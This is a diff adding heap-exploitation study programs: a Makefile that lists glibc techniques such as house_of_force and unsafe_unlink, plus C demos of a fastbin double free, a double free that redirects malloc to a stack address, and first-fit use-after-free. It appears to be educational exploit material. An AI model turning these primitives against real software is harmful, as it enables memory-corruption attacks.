update 3.3.5

src/Others/3.3.5_heap_exploit/Makefile

@@ -0,0 +1,8 @@
+PROGRAMS = fastbin_dup fastbin_dup_into_stack unsafe_unlink house_of_spirit poison_null_byte malloc_playground first_fit house_of_lore overlapping_chunks overlapping_chunks_2 house_of_force unsorted_bin_attack house_of_einherjar house_of_orange
+CFLAGS += -std=c99 -g
+
+# CFLAGS += -fsanitize=address
+
+all: $(PROGRAMS)
+clean:
+        rm -f $(PROGRAMS)

src/Others/3.3.5_heap_exploit/fastbin_dup.c

@@ -0,0 +1,34 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+int main() {
+    fprintf(stderr, "Allocating 3 buffers.\n");
+    char *a = malloc(9);
+    char *b = malloc(9);
+    char *c = malloc(9);
+    strcpy(a, "AAAAAAAA");
+    strcpy(b, "BBBBBBBB");
+    strcpy(c, "CCCCCCCC");
+    fprintf(stderr, "1st malloc(9) %p points to %s\n", a, a);
+    fprintf(stderr, "2nd malloc(9) %p points to %s\n", b, b);
+    fprintf(stderr, "3rd malloc(9) %p points to %s\n", c, c);
+
+    fprintf(stderr, "Freeing the first one %p.\n", a);
+    free(a);
+    fprintf(stderr, "Then freeing another one %p.\n", b);
+    free(b);
+    fprintf(stderr, "Freeing the first one %p again.\n", a);
+    free(a);
+
+    fprintf(stderr, "Allocating 3 buffers.\n");
+    char *d = malloc(9);
+    char *e = malloc(9);
+    char *f = malloc(9);
+    strcpy(d, "DDDDDDDD");
+    fprintf(stderr, "4st malloc(9) %p points to %s the first time\n", d, d);
+    strcpy(e, "EEEEEEEE");
+    fprintf(stderr, "5nd malloc(9) %p points to %s\n", e, e);
+    strcpy(f, "FFFFFFFF");
+    fprintf(stderr, "6rd malloc(9) %p points to %s the second time\n", f, f);
+}

src/Others/3.3.5_heap_exploit/fastbin_dup_into_stack.c

@@ -0,0 +1,38 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+int main() {
+    unsigned long long stack_var = 0x21;
+    fprintf(stderr, "Allocating 3 buffers.\n");
+    char *a = malloc(9);
+    char *b = malloc(9);
+    char *c = malloc(9);
+    strcpy(a, "AAAAAAAA");
+    strcpy(b, "BBBBBBBB");
+    strcpy(c, "CCCCCCCC");
+    fprintf(stderr, "1st malloc(9) %p points to %s\n", a, a);
+    fprintf(stderr, "2nd malloc(9) %p points to %s\n", b, b);
+    fprintf(stderr, "3rd malloc(9) %p points to %s\n", c, c);
+
+    fprintf(stderr, "Freeing the first one %p.\n", a);
+    free(a);
+    fprintf(stderr, "Then freeing another one %p.\n", b);
+    free(b);
+    fprintf(stderr, "Freeing the first one %p again.\n", a);
+    free(a);
+
+    fprintf(stderr, "Allocating 4 buffers.\n");
+    unsigned long long *d = malloc(9);
+    *d = (unsigned long long) (((char*)&stack_var) - sizeof(d));
+    fprintf(stderr, "4nd malloc(9) %p points to %p\n", d, &d);
+    char *e = malloc(9);
+    strcpy(e, "EEEEEEEE");
+    fprintf(stderr, "5nd malloc(9) %p points to %s\n", e, e);
+    char *f = malloc(9);
+    strcpy(f, "FFFFFFFF");
+    fprintf(stderr, "6rd malloc(9) %p points to %s\n", f, f);
+    char *g = malloc(9);
+    strcpy(g, "GGGGGGGG");
+    fprintf(stderr, "7th malloc(9) %p points to %s\n", g, g);
+}

src/Others/3.3.5_heap_exploit/first_fit.c

@@ -0,0 +1,24 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+int main() {
+    char* a = malloc(512);
+    char* b = malloc(256);
+    char* c;
+
+    fprintf(stderr, "1st malloc(512): %p\n", a);
+    fprintf(stderr, "2nd malloc(256): %p\n", b);
+    strcpy(a, "AAAAAAAA");
+    strcpy(b, "BBBBBBBB");
+    fprintf(stderr, "first allocation %p points to %s\n", a, a);
+
+    fprintf(stderr, "Freeing the first one...\n");
+    free(a);
+
+    c = malloc(500);
+    fprintf(stderr, "3rd malloc(500): %p\n", c);
+    strcpy(c, "CCCCCCCC");
+    fprintf(stderr, "3rd allocation %p points to %s\n", c, c);
+    fprintf(stderr, "first allocation %p points to %s\n", a, a);
+}